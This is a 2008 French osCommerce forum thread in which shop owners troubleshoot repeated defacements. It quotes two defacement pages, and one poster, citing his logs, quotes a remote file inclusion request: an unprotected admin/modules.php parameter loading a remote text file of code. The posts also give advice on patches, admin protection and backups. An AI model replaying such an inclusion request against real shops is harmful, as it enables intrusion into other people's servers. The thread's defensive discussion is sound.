Mon site victime de hacker |
Bienvenue invité ( Connexion | Inscription )
Mon site victime de hacker |
12 Jul 2008, 13:09
Message
#1
|
|
Ceinture orange OSC Groupe : Membres Messages : 224 Inscrit : 16-June 05 Membre no 6230 |
Bonjour,
Mon site a été victime ces deux derniers jours de hacker. La première fois cela ne touchait que la page d'accueil et la on le retrouvait sur toutes les pages. Il semble qu'ils n'arrivent pas à pénétrer le FTP ( et j'en ai d ailleur changé le mot de passe) car il sne suppriment pas tous les fichiers. Ils arrivent à modifier le fichier index ou a injecter un fichier à eux. Le contenu du premier fichier qui ne dérangeait que la page d'accueil était: index.html Code <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9" /> <title>Heykýd By Türkler Çýlgýn Türkler :)</title> <style type="text/css"> <!-- body { background-color: #000000; } .style14 { color: #FFFFFF; font-weight: bold; } .style17 { font-size: 36mm; font-family: Impact; } .style18 {font-family: "Trebuchet MS"} --> </style> </head> <body> <div align="center"> <p class="style14"><img src="http://img229.imageshack.us/img229/7538/asfwv8.gif" width="400" height="100" /></p> <p class="style14"><span class="style17"><strong>OWNED </span><br /> <span class="style18">English: Contact to fix your security problems<br /> Turkish: Güvenlik sorunlarını düzeltmek için iletişime geç </span></p> <p class="style14">sinan@kostad.net ( Microsoft Live Messenger)</p> <p class="style14">Fhrisby@Gmail.Com ( Google Mail)<br>SpyTurks.Org - - - Turkddl.gen.tr </p> </div> </body> </html> le second ils ont remplacé mon fichier index sans changer sa date d emodification et le contenu était: Code <span class="title"></span><span class="date"></span><style type="text/css"> <!-- body,td,th { color: #FFFFFF; font-family: Verdana, Arial, Helvetica, sans-serif; } body { background-color: #000000; } .style1 { font-size: 36px; font-weight: bold; } .style2 { font-size: 18px; font-weight: bold; } .style3 { font-size: 24px; font-weight: bold; } .style4 { font-family: "Courier New", Courier, monospace; color: #999999; </style><title>Hacked By Kiki / İstilaCrew Family</title> <br> <br> <br> <br> <div align="center" class="style1"> <p>H A C K E D ! </p> </div> <p align="center" class="style3">By</p> <p align="center" class="style3"> Kiki / İstilaCrew Family</p> <center>İstilaCrew Family : C4patr0n - Hilvanli - Spyc0bra - Kamikaze - </center> <br> <center><font color=red>By.Kiki sys</font> : FUCK YOU USA..!</center> <br> <center><font color=red>N0</font>WAR! </center> <br> <p align="center" class="style2">Contact: bykiki@kostad.net & by_kiki@msn.com</p></a></li> <embed src="http://www.haber-turk.org/wp-content/isinin-piri.mp3" width="21" height="15" hidden="" type="audio/mpeg" true autostart="true" loop="-1"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> Auriez vous une idée sachant que le webmaster me confirme que les patchs étaient bien appliqués mais doutes que quelques modifs d'un autre programmeur qui a suivi le projet puissent avoir eu un impact. Les modifs ont essentiellement été faites dans l admin. Merci à ceux qui me mettront sur la voie |
|
12 Jul 2008, 14:39
Message
#2
|
|
Ceinture orange OSC Groupe : Membres Messages : 191 Inscrit : 15-November 04 Membre no 3784 |
Bonjour ,
Effectivement je souhaiterai avoir plus d'infos moi aussi car j'ai vu le problème du site en question ! Thierry |
|
12 Jul 2008, 14:44
Message
#3
|
|
Ceinture bleue OSC Groupe : Membres Messages : 828 Inscrit : 27-May 05 Membre no 6003 |
utilisez vous customers_testimonials ?
si oui, il faut patché cet addon ... ensuite vérifiez si vous avez tous ces correctifs : http://www.oscommerce-fr.info/faq/category.php?cID=33 |
|
15 Jul 2008, 07:26
Message
#4
|
|
Ceinture orange OSC Groupe : Membres Messages : 224 Inscrit : 16-June 05 Membre no 6230 |
Bonjour,
Non je n'ai pas cette contrib customers_testimonials. Merci pour ces patchs que j'avais vu mais pensais avoir sur ma boutique. je vais les prendre un par un et vérifier qu'ils y soient. |
|
18 Jul 2008, 10:09
Message
#5
|
|
Ceinture orange OSC Groupe : Membres Messages : 178 Inscrit : 19-January 05 Membre no 4435 |
mutualisé ou dédié?
avez-vous contacté votre hébergeur pour savoir s'il s'agit d'un cas isolé auquel cas cela provient certainement d'une faille à définir (mot de passe, page mal codé suite à modification, mise à jour non effectuée...), soit c'est le serveur de votre hébergeur qui c'est fait attaqué et là il n'y a pas grand chose à faire que de tout réinstaller (changer les codes aussi). Il existe une contrib en relation avec la création de thumbnails (dont j'ai perdu le nom) qui a une injection sql. Avez-vous ce type de contrib? -------------------- CRE_Loaded_OSC_6.0_SP1.2 + patchs + contrib
|
|
21 Jul 2008, 08:34
Message
#6
|
|
Ceinture orange OSC Groupe : Membres Messages : 224 Inscrit : 16-June 05 Membre no 6230 |
Bonjour,
merci pour ces pistes. Du côté du serveur cela semble ok car aucun autre site qui est est deçu n'a été touché. Il s'agit d'un dédié avec quelques sites dessus dont j'ai les adresses. Je n'utilise pas de contrib pour la création de thumbnails. La seule modif faite après recherche était sur la page contact_us que j'ai donc supprimer pour remettre celle d'origine. Depuis je n'ai plus eu d'attaques donc j'en déduit que c'était elle qui me faisait défaut. Il s'agissait de cette contrib: http://www.oscommerce.com/community/contri...enhancement+1.3 En parallèle j'ai félicité le hacker alors est ce la page contact us ou mon e-mail qui l'a gratifié je ne sais toujours pas mais avec un peu de recul il semble que le problème soit résolu. |
|
22 Jul 2008, 10:43
Message
#7
|
|
Ceinture orange OSC Groupe : Membres Messages : 224 Inscrit : 16-June 05 Membre no 6230 |
Bon je vous tiens au jus de mes nouvelles aventures avec mes amis hacker.
Je viens donc d'être victime d'un nouveau hack Donc toujours même façon de faire. Insertion d'un index.html et d'un nouveau index.php Le hackeur est différent et a soumis un forum turc sur le sujet. Je vais essayer de traduire ce forum et faire des recherches sur oscommerce dedans et vous tiendrai au courant. En tout cas on peut éliminer la contrib dont je parlais au post préédent. |
|
22 Jul 2008, 13:17
Message
#8
|
|
Ceinture orange OSC Groupe : Membres Messages : 224 Inscrit : 16-June 05 Membre no 6230 |
Bon bein voila ils sont parvenus à leur fin.
Tous les fichiers effacés je vous tiendrai au courant Ce message a été modifié par tidi - 22 Jul 2008, 14:57. |
|
22 Jul 2008, 17:10
Message
#9
|
|
Ceinture orange OSC Groupe : Membres Messages : 224 Inscrit : 16-June 05 Membre no 6230 |
Bon je vois que ça a pas l'air de pationner les foules alors je vous préviens qu'oscommerce est clairement ciblé.
Voici une recherche dans google sur mon hacker. **http://www.google.fr/search?q=c4panzer&sourceid=navclient-ff&ie=UTF-8&rlz=1B3GGGL_frFR242FR242 Le nombre impressionnant de boutiques touchées montre clairement une faille peut être inconnue à ce jour. Je recherche de mon côté mais sachez que j'ai été en contact avec mon webmaster ainsi qu'un autre touché par ce problème en France et qu'on ne voit pour l'instant la faille. |
|
22 Jul 2008, 18:41
Message
#10
|
|
Ceinture orange+ OSC Groupe : Membres Messages : 470 Inscrit : 30-May 07 Membre no 17519 |
Je suis pas en pro en hack mais si il a reussi a tout effacer de ton FTP je vois 2 solutions rapide :
- soit ton mot de passe est super simple a trouver (ex : je vends des habit nike et mon MDP=nike) - soit il a reussi a uploader un fichier sur ton serveur... par je ne sais quel moyen... Le resultat est qu'en fouillant tes fichiers log tu devrai peut etre trouver une piste non? |
|
22 Jul 2008, 19:06
Message
#11
|
|
Ceinture orange OSC Groupe : Membres Messages : 224 Inscrit : 16-June 05 Membre no 6230 |
merci de ton soutien.
mais le problème ne vient pas du ftp. En effet entre les diverses attaques le mot de passe qui étaient tres complexe car générés automatiquement ne peuvent pas être le problème. Ensuite les logs tracent justement ce qu'il se passe sur le ftp et là ils sont passés par une injection de script. D'après les hackers que je piste le problème viendrait du fichier include et de son contenu. |
|
22 Jul 2008, 19:13
Message
#12
|
|
Ceinture orange+ OSC Groupe : Membres Messages : 470 Inscrit : 30-May 07 Membre no 17519 |
euh si je ne me trompe pas il me semble que les logs ne trace pas que le FTP... peut etre quelqu'un pourra confirmer ou corriger...
Pour le include je ne vois pas a quel endroit dans osc on fait un include qui serai propice a du hack ex: www.monsite.fr/index.php?inc=test.php et encore il faudrait vraiment que le code ne soit pas protegé et que l'on puisse faire : www.monsite.fr/index.php?inc=www.google.fr Dans ce cas la il serai facile de hacker ton site... Personnellement j'ai un site qui utilise ce système et il est vrai que je subit des tentatives de hack tout les jours depuis maintenant 2 ans ... mais heureusement pour moi sans succès ! honnetement sur du code propre comme osc le plus probable reste le MDP ... mai si tu est sure de ce coté la... je ne peux pas t'aider plus... Courage |
|
22 Jul 2008, 20:27
Message
#13
|
|
Ceinture orange OSC Groupe : Membres Messages : 224 Inscrit : 16-June 05 Membre no 6230 |
merci en tout cas de ton soutien
Je parlais du repertoire include. Ecoute je vois ça avec mon programmeur . Merci encore |
|
24 Jul 2008, 11:08
Message
#14
|
|
Ceinture marron OSC Groupe : Membres Messages : 1690 Inscrit : 10-October 06 Lieu : Rives du Lez Membre no 12571 |
bjr
au risque de te decevoir tidi, j'ai regardé de plus près les exploits de ton hacker sur google, et l'ensemble des boutiques attaquées sont soit basées sur des templates, soit sont des versions anciennes (de 2003) et rarement en production. Je pencherai donc sur une mise à jour des patchs de sécurité de base qui a été ratée. -------------------- "Pourquoi vois-tu la paille qui est dans l'oeil de ton frère et n'aperçois-tu pas la poutre qui est dans ton oeil ?".(Saint Luc, VI-41)
|
|
24 Jul 2008, 13:26
Message
#15
|
|
Ceinture orange OSC Groupe : Membres Messages : 224 Inscrit : 16-June 05 Membre no 6230 |
Bonjour,
Merci coconimo, mon webmaster a effectivement revu les patchs et mon site et effectivement il manquait semble t il des patchs. Avant de crier victoire j'attends la suite. Désolé si ce post a servi à rien vu qu'au départ les patchs étaient soit disant sur la boutique. S'il y a du nouveau je vous tiens au courant. |
|
24 Jul 2008, 18:21
Message
#16
|
|
Ceinture blanche OSC Groupe : Membres Messages : 14 Inscrit : 9-June 08 Membre no 22089 |
Bonsoir Tidi.
Ok, tu interveins si il y a de nouveau des attaques. La voie du manque de correctifs semblent être la bonne. On ne le dit pas assez : Mise à jour - Mise à jour. Et, surtout, sauvegarde hebdomadaire minimum en cas de "pépin". -------------------- Oscommerce MS 2 W3C - Firefox (Webdev) - Opera 9.5 - Notepad+
|
|
25 Jul 2008, 11:54
Message
#17
|
|
Ceinture orange OSC Groupe : Membres Messages : 224 Inscrit : 16-June 05 Membre no 6230 |
Merci de ton intervention.
Effectivement pensez bien à faire des sauvegardes car depuis 3 mois je ne l'avais pas fait pour le dossier image et je suis obligé de me retaper plus de 1000 photos. On court partout et puis des fois on oublie l'essentiel. Pourtant j'avais mis en place une sauvegarde de la BD toutes les douze heures, les fichiers qui sont modifiés sont très souvent sauvegardés aussi et puis voila un oublie un coup de trafalgar et on perd son temps. |
|
6 Aug 2008, 17:10
Message
#18
|
|
Ceinture orange OSC Groupe : Membres Messages : 258 Inscrit : 17-March 04 Lieu : Paris Membre no 2144 |
Ma boutique a été hackée plusieurs fois elle aussi. Un hack classique avec simple remplacement de la home.
Elle était en développement donc pas protégé par mot de passe sur la partie admin avec un htaccess. J'ai pu lire les logs d'accès de la boutique et il s'avère que notre gars avait utilisé une faille de sécurité dans admin/modules.php Il s'agit visiblement d'une variable non protégée qu'il a utilisé pour injecter un fichiet txt contenant du code et lui permettant d'avoir plus amples accès au serveur. L'attaque se passant ainsi ADRESSE_DE_LA_BOUTIQUE/admin/modules.php?module_directory=http://www.SUPPRIME_PAR_MOI.com/bot4-id.txt Je vais voir de mon côté comment je peux bloquer ça. Si vous avez vous aussi une solution (a part fermer boutique ^^) n'hésitez pas à partager. Je précise que j'utilise la dernière MS téléchareable depuis ce site. PS : Si votre niveau d'anglais le permet, peut-être pourriez-vous envoyer cette info de ma part à la team de dev d'Oscommerce ? |
|
6 Aug 2008, 20:12
Message
#19
|
|
Ceinture marron OSC Groupe : Membres Messages : 1690 Inscrit : 10-October 06 Lieu : Rives du Lez Membre no 12571 |
Ma boutique a été hackée plusieurs fois elle aussi. Un hack classique avec simple remplacement de la home. Elle était en développement donc pas protégé par mot de passe sur la partie admin avec un htaccess. .../... PS : Si votre niveau d'anglais le permet, peut-être pourriez-vous envoyer cette info de ma part à la team de dev d'Oscommerce ? à lire d'urgence : http://www.oscommerce-fr.info/forum/index....showtopic=56509 -------------------- "Pourquoi vois-tu la paille qui est dans l'oeil de ton frère et n'aperçois-tu pas la poutre qui est dans ton oeil ?".(Saint Luc, VI-41)
|
|
7 Aug 2008, 09:28
Message
#20
|
|
Ceinture orange OSC Groupe : Membres Messages : 258 Inscrit : 17-March 04 Lieu : Paris Membre no 2144 |
Ma boutique a été hackée plusieurs fois elle aussi. Un hack classique avec simple remplacement de la home. Elle était en développement donc pas protégé par mot de passe sur la partie admin avec un htaccess. .../... PS : Si votre niveau d'anglais le permet, peut-être pourriez-vous envoyer cette info de ma part à la team de dev d'Oscommerce ? à lire d'urgence : http://www.oscommerce-fr.info/forum/index....showtopic=56509 Oui merci ça je le sais ! Comme je l'ai dis, boutique en dev et pas en production avec clients, commandes etc. Pour être précis elle est sur un espace privé à moi et normalement personne n'aurait du y arriver. Enfin normalement bref ! Pour une boutique en dev, ca me faisais ch... de devoir retaper mon pass 50x par jour. D'où le peu de protection. Il est évident qu'en prod elle aurait été plus protégée donc pas la peine de me faire la leçon ;o) L'objet de mon message n'était d'ailleurs pas là mais était de signaler une faille découverte justement sur une partie non protégée de la boutique. Elle n'aurait sans doute pas été exploitée avec un htaccess, je suis d'accord, mais sans doute pas découverte non plus ! Bref, pour ceux que ca interesse je fais partager, pour les autres... bah voilà PS, dans le post qu'on vient de me proposer il est fait mention de "cross scripting" en ces termes : osCommerce n'a aucune faille connue de ce type (il en avait, mais les versions récentes depuis 2 ans sont résistantes à ce genre d'attaque) Et pourtant |
|
7 Aug 2008, 11:20
Message
#21
|
|
5eme dan OSC Groupe : Administrateur Messages : 9221 Inscrit : 4-March 03 Lieu : Pau Membre no 927 |
PS, dans le post qu'on vient de me proposer il est fait mention de "cross scripting" en ces termes : Et pourtant, ton panneau d'administration était ouvert à tous puisque sans protection. osCommerce n'a aucune faille connue de ce type (il en avait, mais les versions récentes depuis 2 ans sont résistantes à ce genre d'attaque) Et pourtant Ce n'est pas une faille de sécurité des scripts ni un hack par cross scripting mais une négligence de ta part. Comme je l'expliquais ailleurs, si tu laisses ta bagnole avec les clés sur le contact, ne t'étonnes pas de te la faire voler. Autre analogie si tu laisses le tiroir caisse de ton magasin ouvert ne va pas pleurnicher auprès du fabricant de la caisse que tu t'es fait voler ta recette. Même l'assureur te rira au nez. -------------------- Tout d'abord : - Ni Hotline ni Service Après Vente, ces forums sont un lieu d'échange. BIEN POSER SA QUESTION (généralités)
Les "Informations Importantes" que vous devez ABSOLUMENT avoir lues : Règlement, Bien poser sa question dans ces forums et Bien utiliser les Forums. Les raccourcis pour gagner du temps : la FAQ, les PDF de la Doc (MS2-fr): PDF-V1 et PDF-V2, le moteur de Recherche sur les forums , la Liste des Contributions de Corbin. ----------------------------- Quelques sites de référence --------------------------- PHP: Le site du Zéro et PHP Débutant avec la DOC en français -- HTML: Self HTML - WebProgrammation -- CSS: OpenWeb - AlsaCréations - CSS/Edge -- Autres ressources: - XajaX - highslide js Les bons outils : EasyPHP - WAMP-5 - - Notepad++ - Firefox et son extension WebDeveloper Le gène idéal c'est le gène original. Le génie des halles est un Génie des Alpages qui tente d'être à la page. (Merci f'murrr pour les cours de philosophie de chien) |
|
7 Aug 2008, 17:01
Message
#22
|
|
Ceinture orange OSC Groupe : Membres Messages : 258 Inscrit : 17-March 04 Lieu : Paris Membre no 2144 |
Bon ok vous êtes tous les maîtres d'Oscommerce et vous savez tous mieux, ok ça je l'ai compris !
Mais franchement vous prenez le problème à l'envers là. Je vous signale un moyen utilisé par un hacker pour entrer dans l'architecture de la boutique. Bêtement (oui car je suis très bête de partager mes infos comme j'aime aussi qu'on les partage avec moi) j'ai pensé que cela intéresserai la communauté de le savoir. Au final quoi ? Bah c'est moi qui me fais clouer au pilori. Oui j'ai été con. Oui je plaide coupable. Oui la méga honte, je n’ai pas mis tout de suite un htaccess sur mon admin et je m'en suis expliqué. Je m'en sens tellement accablé que je vais m'enterrer sous six pieds de terre avec quatre pieux dans le coeur et les yeux ! Voilà ! Maintenant, contrairement à ce que vous sous entendez, je ne viens pas pleurnicher, je viens vous dire qu'il y a eu ça, que j'ai trouvé comment le gars a fait et vous en apporte même les éléments. Parce que je croyais que c'était utile. Effectivement si j'avais mis ce foutu htaccess ce ne serait pas arrivé mais voilà c'est arrivé et je vous fais partager mon expérience pour que ca n'arrive pas à d'autre. Voire même éventuellement fermer la porte utilisée par ce hacker. Après, si vous préférez les œillères, libre à vous. |
|
7 Aug 2008, 19:37
Message
#23
|
|
Ceinture marron OSC Groupe : Modérateurs Messages : 1819 Inscrit : 14-March 03 Lieu : Beaune (21200) Membre no 961 |
Ce que te dis gentiment Gnidal, c'est que l'admin DOIT être sécurisé. A chacun sa méthode. Certains changent le nom du répertoire, d'autres ajoutent un htaccess, d'autres encore y rajoutent une contrib de connexion à l'admin et d'autres utilisent les 3 à la fois. Il y a de nombreuses méthodes. Je n'ai pas refais une install de Oscommerce depuis des années mais il me semble qu'à la fin de l'install, il est bien indiqué de sécuriser l'admin. Donc pour en revenir au problème d'œillère, l'admin est sécurisé vu que chacun doit le faire à l'install. Il n'y a pas de faille. Ce n'est pas comme la faille de je ne sais plus laquelle contrib WYSIWYG de l'admin qui elle était exploitable l'admin sécurisé ou non.
La faille que tu indiques, elles n'est pas exploitable si l'admin est sécurisé. Et si tu regardes bien, dans Google, on peut détecter certaines boutiques qui n'ont pas d'admin sécurisés. Elles sont toutes hackées. Par contre, je connais pas ou peu de boutique hackée depuis le front office (la partie catalogue). Pourquoi ? Parce qu'il s'agit de la partie publique et que tous les efforts ont été fait dessus. -------------------- The hardest thing in this world is to live in it.
Force jaune devant, marron derrière J'ai touché le fond de la piscine Dans ton petit pull marine... |
|
7 Aug 2008, 21:41
Message
#24
|
|
5eme dan OSC Groupe : Administrateur Messages : 9221 Inscrit : 4-March 03 Lieu : Pau Membre no 927 |
Ma remarque est sur le fait que tu parlais de faille de sécurité et je souligne, si c'est encore nécessaire, qu'il n'y a pas de faille mais négligeance de l'utilisateur. Ok Riziere, tu nous signales avoir fait une erreur, que cette erreur a permis à un pirate de hacker ton site et tu tiens à en informer la communauté, c'est louable à toi. Et nous l'avons entendu, merci encore de ce témoignage en espérant qu'il servira de leçon aux autres utilisateurs. Bien cordialement, ce sujet est clos. -------------------- Tout d'abord : - Ni Hotline ni Service Après Vente, ces forums sont un lieu d'échange. BIEN POSER SA QUESTION (généralités)
Les "Informations Importantes" que vous devez ABSOLUMENT avoir lues : Règlement, Bien poser sa question dans ces forums et Bien utiliser les Forums. Les raccourcis pour gagner du temps : la FAQ, les PDF de la Doc (MS2-fr): PDF-V1 et PDF-V2, le moteur de Recherche sur les forums , la Liste des Contributions de Corbin. ----------------------------- Quelques sites de référence --------------------------- PHP: Le site du Zéro et PHP Débutant avec la DOC en français -- HTML: Self HTML - WebProgrammation -- CSS: OpenWeb - AlsaCréations - CSS/Edge -- Autres ressources: - XajaX - highslide js Les bons outils : EasyPHP - WAMP-5 - - Notepad++ - Firefox et son extension WebDeveloper Le gène idéal c'est le gène original. Le génie des halles est un Génie des Alpages qui tente d'être à la page. (Merci f'murrr pour les cours de philosophie de chien) |
|
Version bas débit | Nous sommes le : 28th March 2024 - 16:37 |
Ce site est déclaré auprès de la commision Nationale de l'Informatique et des Libertés (déclaration n°: 1043896) |